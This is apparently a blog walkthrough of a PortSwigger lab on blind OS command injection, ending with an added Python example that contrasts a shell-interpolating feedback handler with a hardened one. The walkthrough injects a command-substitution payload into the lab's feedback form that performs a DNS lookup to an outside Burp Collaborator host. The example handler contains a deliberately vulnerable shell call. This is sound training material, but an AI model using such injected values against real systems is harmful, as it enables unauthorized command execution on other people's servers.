In this post, we’re going to solve the PortSwigger lab: “Blind OS command injection with out-of-band interaction”.

PortSwigger lab start page

To solve the lab, we need to trigger a DNS lookup to the Burp Suite public server (burpcollaborator.net). To do this, we’ll use a Blind OS Command Injection found in the feedback function.

Submit feedback button on the page

Feedback form with fields to fill

As we can see, there are several fields to fill out. So let’s fill them in:

Completed form fields

Now, before submitting the feedback, we prepare Burp Suite to receive the requests:

Proxy configuration in browser

Activating interception in Burp Suite

With this ready, we submit the feedback to capture the request:

Submitting the feedback form

Request intercepted in Burp Suite

This is the request that’s sent to the server when submitting feedback. To work with it, we send it to Repeater by pressing Ctrl+R:

Request sent to Burp Suite Repeater

Once in Repeater, we can see that a valid request simply gets a 200 status response and not much else.

However, we’re going to check whether any of the parameters being sent lets us execute a command and, with that, perform a DNS lookup to the Burp Suite server:

Nslookup command injection for DNS lookup

$(nslookup burpcollaborator.net)

After sending this request, refreshing the page shows that we’ve solved the challenge:

Lab completed successfully

That said, the best way to tackle “out-of-band” style challenges is with Burp Suite PRO, which provides the Burp Collaborator client feature:

Burp Collaborator client in Burp Suite PRO

In fact, the next and final OS Command Injection challenge (at least as of February 2022) can’t be solved without Burp Suite PRO.
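Why the $(...) payload above runs on the server while the response stays a plain 200, and what the fix looks like: this is an added example, not code from the lab or from the original post. The handler names, the echo command standing in for whatever program the feedback function calls, and the oob_marker file standing in for the DNS lookup are all assumptions.

```python
import os
import subprocess
import tempfile

# Constructed input: same $(...) shape as the payload in the post, but with a
# harmless local command standing in for the DNS lookup.
PAYLOAD = "a@example.com$(touch oob_marker)"


def handle_feedback_vulnerable(email: str, workdir: str) -> int:
    """Hypothetical handler: interpolates the field into a shell string."""
    # Double quotes do not stop command substitution: sh runs $(...) first
    # and pastes its output into the echo argument.
    cmd = f'echo "feedback from {email}" > /dev/null'
    subprocess.run(cmd, shell=True, cwd=workdir, check=False)
    return 200  # output is discarded, so the response never changes (blind)


def handle_feedback_hardened(email: str, workdir: str) -> int:
    """Same behaviour, but the field is one argv element and no shell runs."""
    subprocess.run(["echo", f"feedback from {email}"], cwd=workdir,
                   stdout=subprocess.DEVNULL, check=False)
    return 200


def observe(handler) -> tuple:
    """Return (status, side_effect_seen) for one request with PAYLOAD."""
    with tempfile.TemporaryDirectory() as workdir:
        status = handler(PAYLOAD, workdir)
        marker = os.path.join(workdir, "oob_marker")
        return status, os.path.exists(marker)


if __name__ == "__main__":
    print("vulnerable:", observe(handle_feedback_vulnerable))
    print("hardened:  ", observe(handle_feedback_hardened))
```

Both handlers return the same status, so only the side effect tells them apart, which is why the lab needs an out-of-band channel to confirm the injection.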